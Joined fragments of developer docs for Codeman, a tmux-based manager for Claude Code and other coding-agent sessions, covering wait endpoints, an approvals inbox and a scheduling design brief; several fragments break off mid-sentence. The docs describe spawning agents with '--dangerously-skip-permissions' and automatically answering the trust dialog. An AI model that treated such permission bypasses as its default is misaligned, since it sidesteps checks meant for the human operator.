- The `tmux codeman-<id8>` column in `ListAgents` (and the registry's `tmux` field)
is the join key to Codeman session ids. The registry's `sessionId` field starts as
the Codeman id (we spawn `claude --session-id <id>`) but drifts after `/clear` or
resume, so it must never be the join key.
- The feature is flag-gated beyond the version: two 2.1.226 sessions on one machine,
one with an inbox socket and one without. Absence is a fallback case, not an error.
- Codeman's default `--dangerously-skip-permissions` spawn puts both ends in the
bypassing class, which delivers; mixed classes hold behind an approval dialog that
expires unattended (upstream default 5 min), which on a headless worker means the
message silently dies. The skill's backstop covers it.
Follow-up, landed in the same PR: local claude spawns now pass
`--name <session name>` so peers carry Codeman session names. The gate is
`buildNameCliArgs()` (session-cli-builder.ts), fail-closed at
`CLAUDE_NAME_FLAG_MIN_VERSION = 2.1.224`: that is the messaging release, the flag's
presence there was verified against the installed 2.1.224 binary, and the version
comes from `getClaudeCliVersion()` (null on probe failure and under vitest), so an
older or unknown CLI gets a command byte-identical to before. That matters because
claude aborts startup on an unknown option, which would kill every session spawn.
The value is allowlist-sanitized (Unicode letters/digits plus ` ._:-`, leading
dashes stripped so it cannot parse as another option, 64-char cap, empty result =
flag omitted) before the double-quoted interpolation in `buildSpawnCommand`, and
only the LOCAL command carries it: the docker/remote builders never see it, since
their CLI is not the binary the probe measured. E2E on an isolated instance
(`CODEMAN_INSTANCE`): process cmdline `claude ... --name w9-msgtest`, registry
`name: "w9-msgtest"`, `ListAgents` lists it under that name, a message round-trip
works, and its replies arrive tagged `from-name="w9-msgtest"` (a derived-name
worker's replies carry no `from-name`). A quick-start without `sessionName` has an
empty Codeman name, so the peer name stays derived: agents should name their
> The [agent wait endpoints](#long-polling-agent-wait) use the normal envelope but
> are the only JSON endpoints that deliberately **hold the connection open**, for up
> to 600 s. Proxy operators and HTTP clients with a global read timeout need to know
> that before pointing them at Codeman.
⚠️ **A `401` is the one status that is not an envelope.** Authentication is rejected
in a request hook, before any handler runs, and it replies with the bare string
`Unauthorized` (`Unauthorized: hook secret required` on the hook path) plus
`WWW-Authenticate: Basic realm="Codeman"`. There is no `success`, no `error`, and no
`errorCode`, because the wrapping hook only wraps object payloads. So a client that
pipes every response straight into a JSON parser dies with a parse error rather than
reporting an auth failure, which is a confusing way to discover that a password is
set. Branch on the HTTP status **before** parsing.
## Error codes → HTTP status
The single source of truth is `ErrorStatus` / `httpStatusForErrorCode()` in
@@ -66,6 +80,459 @@ the HTTP status.
Adding a new error code is non-breaking; removing or renaming one is a major change.
## Long-polling (agent wait)
Three calls block until something happens instead of answering immediately. They
exist because SSE is Codeman's only other "tell me when" channel, and an agent
driving the API from a shell tool cannot practically hold a stream and parse
events inline.
| Call | Blocks until |
|------|--------------|
| `GET /api/v1/sessions/:id/wait` | one of a set of lifecycle signals fires |
| `GET /api/v1/sessions/:id/wait-output` | a literal string appears in the session's output |
| `POST /api/v1/sessions/:id/input` with `wait` | the input is delivered **and then** a signal fires |
`POST .../input` with `wait` is not the same as a `POST` followed by a separate
`GET .../wait`. It registers the waiter **before** writing, which closes the window
in which a separate wait sees the session still idle from the previous turn and
answers instantly with the wrong turn's result. Use it whenever you send a prompt
and want to know when that prompt is done.
### Three semantics that break callers who assume otherwise
**1. A timeout is HTTP `200`, not an error.** A wait that ends without its signal
returns `{"success":true, ...,"wait":{"timedOut":true,"signal":null}}`. The
intended pattern is a client-side loop over short waits, because `tailscale serve`
and cloudflared can both cut an idle connection, and turning every poll boundary
into a `4xx` would make that loop indistinguishable from a real failure. `408` is
auto-retried by several clients (silently doubling the polling load), `504` is what
a genuine tunnel failure looks like, and `204` cannot carry `waitedMs` / `status` /
`limitPaused`. Reserve error handling for the four codes in the table below.
**2. `stop` and `blocked` fire only for `claude` sessions.** Both come from Claude
Code hooks, and no other mode installs them: `shell` runs no agent, and the external
CLIs (`opencode`, `codex`, `gemini`, `antigravity`, `pi`) render their own TUIs and post
no hooks. For every non-`claude` mode only `idle`, `working` and `exit` are
accepted, and of those only `exit` is dependable: see the caveats under
[Signals](#signals) before building on `idle`. Requesting `stop` or `blocked`
**explicitly** on such a session is a
`400`; omitting `until` never fails, the server just drops them from the default set
and echoes the narrowed set back as `wait.until`. Three more places hooks can go
missing even in `claude` mode: a **Docker case** needs
`CODEMAN_DOCKER_BRIDGE_HOOKS=1`, since a container cannot reach a loopback-bound
Codeman (without it, only `idle` / `working` / `exit` work); a **remote-SSH
case** runs the agent on another host, whose hooks may never reach this server at
all; and a case whose hook config was written by **Codeman < 1.13.0 against an
`--https` install** carries hook curls without `-k`, which TLS-fail silently (the
hook line ends in `|| true`). Codeman now writes `curl -sk` and repairs a stale
case config the next time a session starts in that case. When in doubt, ask for
`stop,idle,exit` so a session without hooks still resolves on the heuristic
signal.
**3. `from=now` does not mean "printed after you asked".** tmux repaints the visible
screen on attach, on resize, and on any TUI redraw, and a repaint arrives as
ordinary output, so text that was already on screen can satisfy a fresh wait. This
was observed live: a marker echoed a minute earlier matched instantly on a new
`from=now` wait. It is inherent to running the agent under a multiplexer, so the
contract is a **marker unique to each call** (`MARK="DONE_$RANDOM"`, send
`echo $MARK`, then wait on `$MARK`), never a generic string like `BUILD OK`.
### Signals
| Signal | Source | Actually fires for |
|--------|--------|--------------------|
| `idle` | the session's own `idle` event | `claude`: yes, on ❯-prompt detection after activity. `shell`: **once only**, ~500 ms after start, and never again. External CLIs: not guaranteed (they render their own TUIs and readiness is output stabilization) |
| `working` | the session's own `working` event | `claude` only in practice (spinner and work-keyword detection are Claude output formats) |
| `stop` | the Claude Code `stop` hook, the definitive end-of-turn signal | `claude` only |
| `blocked` | a `permission_prompt` or `elicitation_dialog` hook | `claude` only, and rarer than it looks: see below |
| `exit` | no process is behind the session | every mode |
`stop` is the signal to orchestrate on where it exists; `idle` is a heuristic
fallback that can flap mid-turn when a spinner pauses. The default set when `until`
is omitted is `stop,idle,exit` (`exit` is in there so a worker that crashes resolves
the wait promptly instead of burning the caller's whole timeout on something that
can no longer happen). On a `claude` worker, prefer an explicit `until=stop,exit`
once the session is up: the default set's `idle` also resolves on a spinner pause,
and on a fresh session the **startup**`idle` (emitted when the CLI first comes up)
can land inside your first wait window and report a turn that never ran. Measured:
a session parked on the trust dialog emits no *further*`idle`, so it is the
startup transition, not the dialog, that produces the false success below.
⚠️ **`exit` means "nothing is running", which includes "not started yet".** The
server answers from `pid === null` plus a mux-layer pane-death probe, and that
covers a session that exited — including a worker that died *inside* its tmux pane
while the local attach client (and therefore `pid`) lives on — one that was
detached, and one that was **created but never started**. So the first wait
after `POST /api/v1/sessions` returns `{"signal":"exit","immediate":true}` in
milliseconds, and reading that as "the worker died" is wrong: it means start it, or
wait for it to come up. `status` is carried alongside so nothing is hidden. The
alternative (trusting `status`) is worse, because a dead PTY parks the session at
`status: "idle"`, which would answer the default wait with `immediate: true` for a
worker that has crashed. A worker dying while a wait is parked resolves it within
a few seconds (a background death-watcher), not at the timeout.
⚠️ **`blocked` is reachable less often than the table suggests.** It fires on two
hooks, and the default configuration suppresses one of them: Codeman spawns claude
with `--dangerously-skip-permissions`, so permission prompts do not happen unless the
instance is switched to the `auto` Claude mode (App Settings), or the caller is a
multi-user account without the bypass grant, which is forced to `--permission-mode
auto`. What does still fire under the default is `elicitation_dialog`, the agent
asking the user a question. So `until=stop,blocked,exit` is a reasonable belt on a
long turn, but a worker that never comes back is far more likely to be working than
blocked, and polling `blocked` alone will sit at its timeout.
⚠️ **On a `shell` session, only `exit` and marker-matching are dependable.** A shell
session emits its one `idle` at startup and then stays `status: "idle"` forever,
whatever the pane is doing, so it never emits a *transition*. Since send-and-wait
requires a transition (and so does `fresh=1`), both can only time out there:
a documented default `wait` on a shell worker running `sleep 4` times out at the
full 25 s. Synchronize hook-less sessions with `wait-output` and a unique marker
instead. The same caution applies to the external CLIs.
### Readiness is not a signal
Nothing here reports "the agent is ready for a prompt", and no combination of
`until`/`fresh` synthesizes one. A freshly created session reads as `exit` (above),
and a `claude` worker in a brand-new case comes up on the CLI's **trust dialog**,
which contains a ❯ prompt of its own. Send-and-wait posted at that moment types the
prompt into the dialog, where the `\r` never gets past it, while the session's
startup `idle` lands inside the wait window: the wait resolves on `idle` in a
couple of seconds with `timedOut: false`, which looks exactly like a completed
turn.
The reliable sequence is: poll `GET /api/v1/sessions/:id` until `.data.pid` is
non-null, then `wait-output` for the composer's own marker (`bypass`, the status
bar of a CLI spawned in bypass mode) with a short timeout, handling the trust
dialog only as the bounded fallback (`trust` matched → send `\r` → wait for
`bypass` again). Do not probe `trust` first and Enter blindly: the dialog text
stays in the terminal buffer for the life of the session, so a `trust` probe with
`from=buffer` keeps matching on every later run and the Enter lands in a ready
| `until` | comma-separated list of `idle,working,stop,blocked,exit` | `stop,idle,exit` | resolves on the first to fire. An unknown token is a `400` naming it, never a silent fallback |
| `timeout` | positive integer ms | `60000` | **validated first, clamped second.**`0`, a negative value and a fractional value are all `400`s, not clamps; a valid value outside `[1000, 600000]` is clamped and echoed as `wait.timeoutMs` |
| `fresh` | `0` \| `1` \| `false` \| `true` | `0` | `1` requires an actual transition, ignoring the state at call time |
Both GET wait routes answer with `Cache-Control: no-store`, because the documented
pattern polls one identical URL in a loop and a cached `{"timedOut":true}` would
turn that loop into a busy spin. `POST .../input` sends no cache header (it is a
POST, which is not heuristically cacheable).
⚠️ **Unknown query parameters are ignored, not rejected**, with one exception
(`regex`, below). In particular `match=` on `/wait` is silently dropped and you get
a plain signal wait, so check the endpoint path before blaming the parameters.
### `GET /api/v1/sessions/:id/wait-output`
| Param | Type | Default | Notes |
|-------|------|---------|-------|
| `match` | literal string, 1 to 200 chars | required | substring match against the PTY stream with ANSI escapes stripped. A match spanning two PTY chunks is found |
| `nocase` | `0` \| `1` \| `false` \| `true` | `0` | case-insensitive compare. The returned snippet keeps the terminal's original casing |
| `from` | `now` \| `buffer` | `now` | `buffer` scans the tail of the existing terminal buffer (bounded, 256 KB by default) before blocking |
| `timeout` | positive integer ms | `60000` | same validation and clamp as `/wait` |
**Matching is literal, never a pattern.** A `regex` parameter is rejected with a
`400` rather than ignored, so a caller that assumed otherwise finds out immediately
instead of waiting on the wrong thing. The reasoning is in
Build the query with `-G --data-urlencode` rather than by hand: a `+` in a
hand-written query string decodes to a space.
### `POST /api/v1/sessions/:id/input` with `wait`
Two optional fields on the existing endpoint:
| Field | Type | Notes |
|-------|------|-------|
| `wait` | `true` or the same comma grammar as `until` | `true` means the default signal set. Omitted keeps the historical fire-and-forget behavior, unchanged. `null`, `false` and an empty string are all read as **absent**, not as an error and not as "wait for the default" |
| `waitTimeout` | positive integer ms | same validation **and** clamp as `timeout`: `0`, a negative and a fractional value are `400`s, anything valid is clamped into `[1000, 600000]` and echoed as `wait.timeoutMs` |
Both are `nullish`, so an explicit `null` from `JSON.stringify` is accepted as
"absent" rather than failing validation. That is deliberate: `.optional()` would
reject it, which has shipped as a real bug twice.
The input must end with `\r` (a real carriage return in the JSON string): Enter is
sent only when the input contains one, so text without it is typed onto the
worker's prompt but never submitted, and the wait then runs its full timeout on a
turn that never started. Verified live; this is the most common silent failure on
this endpoint.
```bash
curl -s -X POST "$API/api/v1/sessions/$SID/input"\
-H 'Content-Type: application/json'\
-d '{"input":"run the tests\r","useMux":true,"clientId":"agent-1","seq":1,
"wait":"stop","waitTimeout":600000}'
```
A **tagged duplicate** (a `clientId` + `seq` pair the server has already applied)
still honors `wait`, because the caller's question is unanswered, but it answers
from the session's current state rather than requiring a new transition: the
original turn may be long over. It comes back as
`"delivered": false, "duplicate": true`.
### Response
All three nest the wait result under `data.wait`, so one client helper works against
`POST .../input` returns the same `wait` object alongside `delivered`, `duplicate`,
`status` and `limitPaused`. `POST .../input`**without**`wait` is unchanged and
still returns `{"success": true, "data": {}}`.
⚠️ `delivered: false` has **two** meanings, and they must be told apart by
`duplicate`: with `duplicate: true` the input was suppressed as an already-applied
redelivery (harmless, the turn it refers to may be long over), while with
`duplicate: false` the **write failed** (typically no PTY behind the session). A
client that reads `delivered === false` as "duplicate" silently treats a failed send
as a success.
| Field | Type | Meaning |
|-------|------|---------|
| `wait.signal` | signal \| `null` | the signal that fired (`/wait` and `/input` only) |
| `wait.until` | array of signals | what the server actually waited on, after narrowing the default set for the session's mode (`/wait` and `/input` only) |
| `wait.matched` | boolean | the string appeared (`/wait-output` only) |
| `wait.match` | string | the literal that was searched for (`/wait-output` only) |
| `wait.snippet` | string \| `null` | bounded window of output around the match, blank runs collapsed for readability (`/wait-output` only) |
| `wait.timedOut` | boolean | the wait hit its timeout. Still a `200` |
| `wait.immediate` | boolean | the condition already held at call time, so nothing was waited for (`waitedMs` is 0) |
| `wait.ended` | boolean | the session went away (deleted or torn down) before the condition was met |
| `wait.aborted` | boolean | the client hung up, so the waiter was released without resolving — and by that definition a client never reads `true`. When the **server** abandons a wait itself (send-and-wait against a session with no PTY), it answers in about a millisecond with `ended: true`, `delivered: false`, `duplicate: false` and `aborted: false`: `delivered`/`ended` carry that story, and `aborted` stays the transport flag. Present for completeness; treat a `true` as "this wait answered nothing", never as an outcome |
| `wait.waitedMs` | number | wall-clock ms actually spent waiting |
| `wait.timeoutMs` | number | the timeout **after clamping**, which is what was applied |
| `status` | `SessionStatus` | the session's status after the wait, so a caller that timed out still learns where things stand |
| `limitPaused` | boolean | the session is paused on a usage limit and will emit nothing until its reset, so a timeout here is expected rather than a stall worth retrying hard |
Read the outcome by discriminator, in this order:
1.`wait.signal !== null` (or `wait.matched === true`): the thing happened.
2.`wait.timedOut`: a poll boundary. Loop again.
3.`wait.ended` or `wait.aborted`: the wait answered nothing, because the session is
gone or was never running. Re-check the session instead of looping.
`wait.immediate` is not a fourth outcome: it rides along with the first one and
means the condition already held at call time, so nothing was actually waited for.
If that is not what you meant, you wanted `fresh=1` or the send-and-wait form. Note
that `{"signal":"exit","immediate":true}` on a session you just created is the
not-started-yet case, not a crash.
**The timeout is clamped, so read it back.** A request for 1800000 ms is silently
reduced to the server's ceiling (600000 ms by default, operator-tunable), and a
request for 1 ms is raised to 1000 ms. `wait.timeoutMs` is the value that was
applied. Without checking it, a caller that asked for 30 minutes and got 10 will
read the timeout as "the worker is wedged" and kill a session that was working fine.
### Errors
| `errorCode` | HTTP | When |
|-------------|------|------|
| `INVALID_INPUT` | 400 | unknown `until` / `wait` token; `stop` or `blocked` requested explicitly on a mode that installs no hooks (the message names the mode); `regex=` on `/wait-output`; `match` outside 1 to 200 chars; a non-numeric `timeout` |
| `NOT_FOUND` | 404 | no such session, or one this caller does not own |
| `SESSION_BUSY` | 409 | this session's waiter cap is full |
| `RATE_LIMITED` | 429 | a per-owner or process-wide waiter cap is full. Retry later; the session you named is not the problem |
The two capacity codes are deliberately different. A process-wide cap reported as
`SESSION_BUSY` would tell the caller to switch sessions, which cannot help. The
error message names the cap that was hit.
⚠️ A `401` is **not** in this table and is not an envelope at all (see
[Response envelope](#response-envelope)). It matters most here: a polling loop that
pipes each wait straight into `jq` fails with a parse error on every iteration
against a password-protected server, which reads as "the wait endpoints are broken".
Check the status first.
The per-session cap is a **combined** budget: signal waiters and output waiters
count against the same 16, not 16 of each. An abandoned request no longer holds its
slot, because the routes release the waiter when the client disconnects, but a
client that opens many concurrent waits against one session will still hit the cap.
## Session lineage (`parentSessionId`)
A create request may name the session that spawned it, which the web UI draws as a
line between the two tabs. Accepted on `POST /api/v1/sessions` and
One cross-session inbox for every prompt that is waiting on a human: permission dialogs, questions (AskUserQuestion / elicitation), and idle prompts. Cards are answerable in place (option digits, Esc, or a typed prompt) from desktop, phone overview, and push notification action buttons. Inspired by Cloudflare OS's Gatekeeper approval queue (https://github.com/cloudflare/cloudflare-os, asynchronous human-in-the-loop approvals): with a fleet of sessions the human is the bottleneck, and today answering means finding the right tab.
## Problems this fixes (all real today)
1.**No cross-session surface.** Pending prompts exist only as per-tab alert colors (`tab-alert-action`/`tab-alert-idle`) and NEEDS YOU rows on the phone overview. Answering means switching to the session and typing.
2.**Alerts die on reload.**`pendingHooks` lives only in `app.js` memory, fed by transient SSE `hook:*` events. A page reload (or a phone browser evicting the tab) silently loses every pending alert. There is no server-side record.
3.**Push Approve/Deny buttons are dead.**`PUSH_EVENT_MAP` already attaches `approve`/`deny` actions to permission pushes, and `sw.js` forwards `event.action` to the page, but the `notification-click` handler in settings-ui.js ignores it (and when no tab is open, the action is dropped entirely). The buttons render on the lock screen and do nothing.
4.**Card context is missing.** The frontend handlers read `data.question` / `data.message` / `data.tool`, but `sanitizeHookData` never forwards `message`, so notifications show generic fallback text.
## Scope
- Claude mode only (hooks fire only for `claude`; external CLIs keep their output-stabilization heuristics and get no inbox items). This mirrors the wait-primitive `stop`/`blocked` gating.
- Permission prompts occur for sessions running `ClaudeMode``normal` / `auto` / `allowedTools` (and the trust-folder dialog even under skip-permissions). Question and idle prompts occur in every mode including `dangerously-skip-permissions`.
- In-memory store (plus the frontend seeding from it on load). Server restart drops items; hooks re-fire on the next prompt. No new state file in v1.
## Data model
At most **one active item per session**: the Claude TUI shows one dialog at a time, so a new prompt event supersedes the session's previous item (resolution `superseded`).
Module-level singleton in the style of `session-wait-registry.ts` (pure, no `Session` import, injected emit callback so there is no import cycle with the server):
-`notePrompt(info)` creates/supersedes the session's item; schedules ONE re-capture ~600ms later (the Notification hook can fire before the dialog finishes painting) which updates `context`/`options` and emits `approval:updated`.
- Option parsing (pure, unit-tested): consecutive `❯? N. label` lines, 2..6 options, labels ≤ 120 chars. Parsed options gate which digits the answer endpoint accepts; when parsing fails the card falls back to Approve(1)/Deny(Esc) only.
- TTL: items expire after 12h (checked on read + a lazy sweep; no standing interval).
### Wiring
-`hook-event-routes.ts`: on `permission_prompt` / `elicitation_dialog` / `idle_prompt`, call `notePrompt` with sanitized data + a pane capture callback (`mux.capturePaneBuffer(muxName)` visible frame, ANSI-stripped via existing utils; fall back to `session.terminalBuffer` tail). On `stop` / `elicitation_complete` / `elicitation_response`, `resolveForSession(id, 'resolved_in_terminal')`.
-`session-listener-wiring.ts`: `working` listener resolves **idle items only** (`working` is heuristic and can flap mid-turn, so it must never clear a pending permission/question dialog); `exit` resolves with `session_ended`. Same singleton-import pattern as `sessionWaits`.
- Session delete route: resolve with `session_ended`.
- **New hook matchers** `elicitation_complete` + `elicitation_response` added to `generateHooksConfig()`, `HookEventType`, `HookEventSchema`, and both SSE registries. `refreshStaleCodemanHooks` gets a staleness probe for them (`hooksJson.includes('elicitation_complete')`) so existing cases heal on next Claude spawn, exactly like the `-k`/secret/marker probes.
-`sanitizeHookData`: allowlist `message` (bounded 500 chars). This also un-deadens the existing notification text paths.
### Routes: `src/web/routes/approval-routes.ts`
Normal authed API (NOT the hook-secret bypass), `ApiResponse` envelope, Zod schemas in `schemas.ts`:
-`GET /api/approvals` → pending items, multi-user filtered by `canAccessOwned` (same policy as session lists). Also sweeps the caller's own items for staleness through `verifyStillAnswerable()`: Claude Code fires no "permission answered" hook, so a dialog answered in the terminal used to sit pending until `stop` and re-arm a red tab alert on the next page load. Only items whose original frame parsed options can be dropped this way, so an unreadable capture keeps the alert.
-`approve` → `writeViaMux('1')` (option 1 is always plain Yes; no Enter, menus react to the digit).
-`deny` → `writeViaMux('\x1b')` (Esc is the official No/cancel; precedent: auto-resume sends Esc the same way).
-`option` → digit `String(n)`; accepted only when `n` is within the item's parsed options (prevents blind digit-poking at an unparsed dialog).
-`text` → `idle` items only: single line, embedded newlines stripped, sent as `text\r` (the `\r` discipline from CLAUDE.md).
- Guards: item still pending (404 otherwise), session exists + ownership via `findSessionOrFail`, session mode installs hooks. **Answer-time re-capture**: for items whose frame parsed options, the pane is re-captured before sending; if the dialog no longer parses, the item resolves and the answer is refused with 409 (the keystroke would land in whatever now has focus). Marks `answered` BEFORE the write so a double-tap cannot double-send; rolls back to pending if the write fails.
-`POST /api/approvals/:id/dismiss` → remove without keystrokes.
-`POST /api/approvals/session/:sessionId/viewed` → acknowledge the session's pending **idle** item (`acknowledgedAt`, emitted as `approval:updated`). Added after the owner reported that a yellow tab clicked and checked went yellow again on reload: the view-clears-idle rule lived in one browser's memory, so the seed re-armed it and other devices never saw the clear. Acknowledgement is deliberately **not** resolution (the prompt is still unanswered, so it stays in the inbox and stays available as Read My Mind context), and deliberately **idle-only** (looking at a permission/question dialog does not answer it, so the red alert survives being viewed).
### SSE
`approval:pending`, `approval:updated`, `approval:resolved` in `sse-events.ts` + `SSE_EVENTS` in constants.js (the parity test pins the sync). Broadcasts carry `sessionId`, so multi-user SSE scoping applies unchanged.
### Push
-`sendPushNotifications` payload gains `approvalId` for the three hook events. Both `approvalId` and the Approve/Deny `actions` are **gated on the opt-in setting**: with it off, permission pushes carry no buttons at all (pre-inbox they rendered and did nothing, so stripping them is the honest shape).
-`sw.js``notificationclick`: when `event.action` is `approve`/`deny`, POST `/api/approvals/:id/answer` directly from the worker (same-origin, cookie credentials) so the buttons work **with no tab open**; on failure fall back to focusing/opening a tab. Non-action clicks keep today's behavior.
- Page-side `notification-click` handler: honor `action` instead of dropping it (also setting-gated, for stale notifications sent before the toggle flipped).
- Question/idle pushes keep no action buttons (options vary per dialog); tapping opens the inbox.
## Frontend
New module `approvals-ui.js` (@loadorder 11.2, after panels-ui.js), prettier-formatted (not added to `.prettierignore`).
- **Seed on connect**: `GET /api/approvals` on init and SSE reconnect; each pending item re-feeds `setPendingHook(...)` so tab alerts and the phone overview survive reload (fixes problem 2 with zero changes to the alert state machine). Items carrying `acknowledgedAt` are skipped, and `markIdleAlertSeen()` (app.js) is what sets it: viewing a session clears its yellow locally and POSTs `.../viewed`, so "I checked it" survives the reload and reaches the user's other devices through `approval:updated`.
- **Desktop**: header bell `btn-approvals` with count badge. Ships default-hidden via marker class `btn-approvals--hidden` (same policy as the attachments button, so `test/mobile-header-buttons-policy.test.ts` excludes it from the default-visible enumeration); JS shows it only while count > 0. Click toggles a drawer of cards: session name + kind, tool/message summary, mono context block, buttons rendered from parsed options (else Approve/Deny), plus Dismiss and Open session. Esc closes; existing z-index layers respected.
- **Phone**: header button stays hidden (`mobile.css`); the phone surface is the overview's NEEDS YOU section, whose rows gain inline ✓/✗ buttons for permission items (tap-through to the session remains the row's main action). Toolbar classes/status language rules from the mobile-overview section of CLAUDE.md apply.
- **i18n**: new strings registered in i18n.js (en + zh-CN); status words carry `data-i18n-skip` where they would collide (mirroring the overview pills).
- **Setting**: `approvalsInboxEnabled`, synced (in `SettingsUpdateSchema`), **default OFF** (owner decision: the entire feature is opt-in, meaning no bell, no drawer, no overview strips, no seeding, and no push action buttons until enabled in App Settings → Panels). Only the store and answer endpoints keep running regardless, so flipping the toggle ON surfaces anything already pending immediately, with no restart.
## Race honesty
The prompt can be answered in the terminal a moment before an inbox answer lands; then the keystroke would hit whatever now has focus (worst case: a digit typed into the composer, not submitted, since no `\r` is ever sent for menu answers). Mitigations, in order: answer-time re-capture (the dialog must still parse on screen or the answer is refused), answered-before-write marking, digit-only/Esc-only writes for menus, and the card's context block showing what the pane looked like when captured. This is the same class of risk `writeViaMux` automation (auto-resume, respawn) already accepts.
## Tests
-`test/approval-inbox.test.ts`: supersede per session, every resolution path, TTL, option parsing fixtures (2-option, 3-option with ❯, unparseable frame), re-capture update.
-`test/routes/approval-routes.test.ts` (`app.inject`, no port): list; hook event creates item; answer approve/deny/option writes the exact bytes (test-PTY echo asserts them); text answers restricted to idle; 404 unknown id; 409 answered twice; option out of range rejected; multi-user scoping.
- Existing suites extended: hook-event schema accepts the two new events; `sanitizeHookData` forwards bounded `message`; SSE parity + mobile-header policy pass as-is by construction.
# Claude Code Build Brief: Add Scheduling to Codeman
## 0. Purpose of This Brief
You are Claude Code working inside the Codeman repository.
Your task is to add a **small, reliable scheduling layer** to Codeman while preserving Codeman's existing architecture and session-management behavior.
This is not a greenfield rewrite. This is not a full product rebuild. This is a focused extension.
The target user wants Codeman-like tmux/web/session management, but with first-class scheduled jobs for Claude, Codex, OpenCode, Terminal, or any other configurable coding-agent harness.
---
## 1. Non-Negotiable Goal
Add scheduling to Codeman so a user can define a scheduled coding-agent job that:
1. Has a name.
2. Uses an existing Codeman-supported agent/session type where possible.
3. Has a working directory.
4. Has a prompt or prompt file.
5. Has a schedule.
6. Can be enabled or disabled.
7. Can be manually run now.
8. When due, creates a Codeman/tmux session.
9. Sends the configured prompt into that session.
10. Records last run, next run, status, and run history.
The first working version should prioritize **scheduling correctness and reuse of Codeman's existing tmux/session system** over UI polish.
| `name` | ✅ | 1–200 chars | Display name; also used as the created session's name. |
| `agentType` | ✅ | `claude` \| `shell` \| `opencode` \| `codex` \| `gemini` \| `antigravity` \| `pi` \| `grok` | Reuses Codeman's `SessionMode`. `shell` = a plain terminal. ⚠️ A `pi` or `grok` job's readiness poll looks for `❯`/a token count, which neither CLI prints, so it burns the poll budget and then sends the prompt anyway (slower start, still works). |
| `workingDir` | ✅ | valid path (allowlist-validated) | Validated at **create/update** (must exist, be a directory, and not resolve into a blocked tree — `/etc`, `/root`, `/proc`, `/sys`, `/dev`, or `/` itself) and again **at fire time**. |
| `launchCommand` | — | ≤ 2000 chars, single line | `shell` mode only: sent as the **first input line** once the shell is up, before the prompt. Ignored for other agent types. |
| `enabled` | ✅ | boolean | Disabled jobs never auto-fire (but **Run Now** still works). |
| `notes` | — | ≤ 2000 chars | Free-form. |
| `concurrencyPolicy` | ✅ | `warn_only` \| `skip_if_same_agent_running` | Applies to **automatic** runs only. See §7. |
| `autoClosePreviousSession` | — | boolean (default **true**) | Recurring schedules only (ignored for `once`): when the next run fires, the still-open session created by this job's **previous** run is closed first via the normal cleanup path. See §8. |
**Cross-field validation** (`refineCronJob` in `schemas.ts`): the conditional
fields above are enforced by a Zod `superRefine` on create. A missing dependent
field (e.g. `scheduleType: "once"` with no `runAt`) is rejected with
`INVALID_INPUT` and a field-specific message.
> ⚠️ **Update caveat.** `PUT /api/cron/jobs/:id` uses a `.partial()` schema that
> does **not** re-run the cross-field `superRefine`. To keep partial edits safe,
> `updateJob()` re-validates the **merged** job against the full `CronJobSchema`
> and throws `400` if the result is inconsistent (e.g. switching to `once`
> without a `runAt`). So the store is never left with a half-valid job.
---
## 4. Schedule types
Next-run math lives in `src/cron/cron-time.ts` (pure, unit-tested in
`test/cron-time.test.ts`). **All wall-clock times use the server's local
timezone** (v0.1 decision).
### `once`
- Fires a single time at the absolute `runAt` epoch-ms.
- A **missed** one-time job (server was down at `runAt`) **still fires once** on
the next tick — `computeNextRunAt` returns `runAt` even if it's in the past,
until the job has fired.
- After firing, the job **self-disables**: `completedOnce = true`, `enabled =
false`, `nextRunAt = null`.
### `interval`
- Fires every `intervalMinutes`, computed as `fireTime + intervalMinutes`.
- ⚠️ **Drift**: the next run re-anchors to the actual fire time, not to an ideal
cadence — a slow tick or restart shifts subsequent runs slightly later. This is
an accepted limitation.
### `daily`
- Fires at `dailyTime` (`HH:MM`) every day, server-local.
- If today's time has already passed, the next run is tomorrow at that time.
### `weekly`
- Fires at `weeklyTime` on each weekday in `weeklyDays` (0 = Sunday … 6 =
Saturday), server-local.
- The next run is the soonest upcoming matching weekday/time within the next 7
days.
---
## 5. Prompt source (`promptMode`)
### `inline_text`
The prompt is the literal `promptText`. Simplest option.
### `prompt_file_path`
The prompt is read from a file at fire time. **This path is security-hardened**
because a job config is attacker-controllable and the file's contents are
injected into an agent session (an exfiltration sink over SSE/terminal).
`resolveSafePromptPath()` enforces, in order:
1. **`realpath` resolution** — symlinks are resolved to their true target, for
the prompt file **and for `workingDir` itself**.
2. **`workingDir` is not a trust boundary** — because it is user-supplied, the
resolved `workingDir` is itself rejected if it is `/` or resolves into a
blocked tree (`/etc`, `/root`, operator extras) or a pseudo-filesystem
(`/proc`, `/sys`, `/dev`). This closes the `workingDir: '/proc'` +
`promptFilePath: '/proc/self/environ'` env-exfil trick. The same rule is
enforced earlier, at job create/update.
3. **Blocklist** (defense-in-depth) — sensitive trees (`/etc`, `/root`,
`/proc`, `/sys`, `/dev`, known secret locations) are rejected for the
resolved prompt file.
4. **Allowlist (primary gate)** — the resolved path **must live inside the job's
(resolved) `workingDir`** (`validateSessionFilePath`). A symlink escaping the
workspace fails here.
5. **Regular-file check** — directories, FIFOs, and `/dev/*` character devices
are rejected (they would hang or OOM an unbounded read).
6. **Size cap** — files larger than **1 MiB** (`MAX_PROMPT_FILE_BYTES`) are
rejected.
7. **Single-line check** — after trailing newlines are stripped, the file
content must be a single line (see §6).
If any check fails, the run is recorded as **`failed`** with the reason; no
session is created.
---
## 6. Prompt delivery (`inputMode`)
Once the CLI is ready (see §8), the prompt is written to the session with a
| `warn_only` | Always launch. (The count is surfaced but not blocking.) |
| `skip_if_same_agent_running` | If ≥ 1 **other, live** session of that mode is active, **skip** this fire — record a `skipped` run and (for recurring schedules) advance the schedule without launching. |
Notes on `skip_if_same_agent_running`:
- Only **live** sessions block: a tab whose CLI already exited (status
`stopped`/`error`) does not count.
- Sessions created by **this job's own previous runs never block it** —
otherwise a recurring job would deadlock on the session it created last time
and fire exactly once.
- A skipped **`once`** job is **not consumed**: it stays armed and retries on
the next tick until the blocking session goes away, then fires its single run.
- A skip is **not** a run: it sets `lastStatus = 'skipped'` but does **not**
advance `lastRunAt`.
- Consecutive skips are **coalesced** — a perpetually-skipped interval job writes
**one** skip record per streak, not one every tick, so it can't bloat
`state.json`.
**Run Now ignores this policy on the server.** The browser shows a `confirm()`
warning if same-type sessions are active, but if you proceed (or call the API
directly), the job launches unconditionally.
---
## 8. What happens when a job fires
Sequence in `CronService.launch()`:
1. A `CronJobRun` is created with status **`created`** and broadcast
(`cron:runCreated`).
2. The prompt is resolved (inline or file, single-line enforced). Failure →
**`failed`**.
3. `workingDir` is checked (`statSync().isDirectory()`). Missing/not-a-dir →
